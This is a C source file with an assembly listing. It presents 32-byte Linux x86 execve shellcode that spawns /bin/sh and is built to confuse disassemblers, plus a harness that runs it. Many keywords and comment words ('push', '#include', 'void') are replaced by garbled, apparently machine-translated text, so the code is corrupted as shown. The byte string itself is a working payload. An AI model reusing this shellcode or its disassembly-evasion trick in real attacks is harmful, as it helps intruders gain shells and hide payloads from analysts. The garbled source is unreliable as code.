/*  execve() shellcode with 'fuck up disasm' ability, 32 bytes long
    by BaCkSpAcE [sinisa86(at)gmail(dot)com]
    BitByterz Labs 2006
    http://www.bitbyterz.org

;
; shellcode.asm
;
  fupdisasm:
    db 0x68		; opcode for PUSH DW »Ø¼¨¡¿¶µ¼ø¡¿¶µ°é
    db 0xcd		; crypt+1, opcode for INT »Ø¼¨¡¿¶µ¼ø¡¿¶µ°é
    db 0x80		; interrupt number (80 in this »öÎã¡¿´µ¼Ô)
    db 0x68		; crypt+3
    db 0x68
    jmp fupdisasm+3
    db 0x68		; MAGIC_BYTE: this byte makes disasm go crazy

; our shellcode which we want to hide
    ²¡¤·¿Ê¤á¤ë byte 11
    pop eax
    xor edx, edx
    ²¡¤·¿Ê¤á¤ë edx
    ²¡¤·¿Ê¤á¤ë 0x68732f2f
    ²¡¤·¿Ê¤á¤ë 0x6e69622f
    mov ebx, esp
    ²¡¤·¿Ê¤á¤ë edx
    ²¡¤·¿Ê¤á¤ë ebx
    mov ecx, esp
    jmp fupdisasm+1	; jumps on ±éÀâ¡Ê¤¹¤ë¡Ë¡¿½»½ê where is hidden int 0x80


    backspace@bitbyterz# nasm shellcode.asm
    backspace@bitbyterz# ndisasm -u shellcode
    00000000  68CD806868        ²¡¤·¿Ê¤á¤ë dword 0x686880cd
    00000005  EBFC              jmp short 0x3
    00000007  686A0B5831        ²¡¤·¿Ê¤á¤ë dword 0x31580b6a
    0000000C  D25268            rcl byte [edx+0x68],cl
    0000000F  2F                das
    00000010  2F                das
    00000011  7368              jnc 0x7b
    00000013  682F62696E        ²¡¤·¿Ê¤á¤ë dword 0x6e69622f
    00000018  89E3              mov ebx,esp
    0000001A  52                ²¡¤·¿Ê¤á¤ë edx
    0000001B  53                ²¡¤·¿Ê¤á¤ë ebx
    0000001C  89E1              mov ecx,esp
    0000001E  EBE1              jmp short 0x1

    Find difference between ½é¤á¤Î and dissasembled shellcode ;)
*/

#´Þ¤à <stdio.h>
#´Þ¤à <string.h>

char shellcode[] =      "\x68\xcd\x80\x68\x68\xeb\xfc\x68"
			"\x6a\x0b\x58\x31\xd2\x52\x68\x2f"
			"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
			"\x89\xe3\x52\x53\x89\xe1\xeb\xe1";

main() {
  ̵¸ú¤Î  (*fp) (̵¸ú¤Î);
  fp = (̵¸ú¤Î *) shellcode;
  printf ("%d bytes\n", strlen(shellcode));
  fp();
}